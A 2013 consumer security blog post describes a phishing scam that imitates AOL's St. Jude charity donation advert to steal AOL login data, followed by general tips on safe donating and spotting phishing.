19/12/2013

Charity scam: do some good – but don't get hoodwinked!

Charity scam: do some good – but don't get hoodwinked! Social engineering

The advice being given today focuses especially on the globally renowned online service AOL. The American Internet giant places great store on corporate social responsibility, and describes many of the projects it has delivered on a website specifically set up for the purpose. One project that has been close to AOL's heart since 2007 is the St. Jude Children’s Research Hospital. Besides reports on the activities carried out for the benefit of the hospital, the company also runs display adverts to generate more donations. One such advert looks like this:
By clicking on "Donate Now", the website visitor is taken to the St. Jude online shop, where donations can be made via a variety of payment methods.
 

The fraudsters' scam

In the current case, the fraudsters are not targeting the payment data of eager donors, but the AOL login data. They have generated a website that is almost identical to the original and have added a fake AOL login form that forwards all the data entered there to them. The current example was placed on a French Wordpress blog by the attackers, almost certainly without the knowledge of the blog operator.
If the cyber criminals get their hands on access data for AOL accounts, there are all sorts of things they can do with it. For example, they can abuse the service's web services with third-party data for sending spam, or sell the login data and associated personal data on the black market. One way or another, the phishing victim becomes a "black sheep".


Hints and tips on donating and preventing phishing

  • Enter the addresses of websites and user logins manually or use your browser's favourites or bookmark function.
    • Be especially careful that you do not make spelling mistakes when typing in the address. Attackers have anticipated this and register typo domains for that purpose.
  • When registering, use complex passwords, and use a separate password for each service.
  • Be wary of emails from senders you do not know.
    • Do not click on links – attacks via malware or phishing traps may be lurking on the website they lead to.
  • Trustworthy companies and institutes will never ask you for access data or personal information via email.
  • Do not blindly trust advertisements on websites saying things such as "your donation is guaranteed to go directly to those that need it" and similar phrases to lure you in. Look carefully at who is behind the website. Is it a legitimate company or organisation?
  • Does the organisation asking for donations look legitimate and transparent? Is there contact information, contact names, financial reports? Can you access information on them? Is the organisation even a registered charity?
  • Look for a quality seal. In German, this could be one of the Deutsches Zentralinstitut für soziale Fragen (Central German Institute for Social Issues – DZI), for example, or in the UK, it could be issued by the Charities Commission. Not every legitimate charity has a seal or certificate, but those that do have been checked by an independent body. However, the checking criteria for issuing such marks will vary.
  • When donating online, exactly as with online shopping, look out for the security features that are displayed in varying forms in modern browsers:
    • The correct web address and associated top-level domain are displayed.
    • The abbreviation "https" appears before the address entered.
    • The address line is highlighted in green in many modern browsers.
    • The site certificate is valid, indicated by a padlock in many browsers.